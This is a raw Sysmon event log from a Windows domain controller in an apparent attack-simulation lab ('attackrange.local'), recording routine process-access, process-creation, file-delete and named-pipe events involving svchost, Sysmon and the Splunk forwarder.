12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64C2-6064-9600-00000000AE01}3000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C2-6064-9600-00000000AE01}3000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.736{266CAFBE-64C2-6064-9600-00000000AE01}3000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000004156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.719{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD3BF10381FE59E9B6E8C53FA5A6CCFA,SHA256=0A69CA03D1E2F91A935F8168B4390277597886046AA5BE3F5B5B78DC2CB11116,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.595{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C71531616565867DF00EB3D5150A687,SHA256=2840221976C1B5084339D6E0DFC924200CE44A3C153365C78ABD3E74D7A71823,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.532{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.532{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.532{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.532{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x80000000000000004147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:10.454{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000004143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:10.423{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 18141800x80000000000000004142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:10.392{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x80000000000000004139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:10.392{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 17141700x80000000000000004138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:02:10.392{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 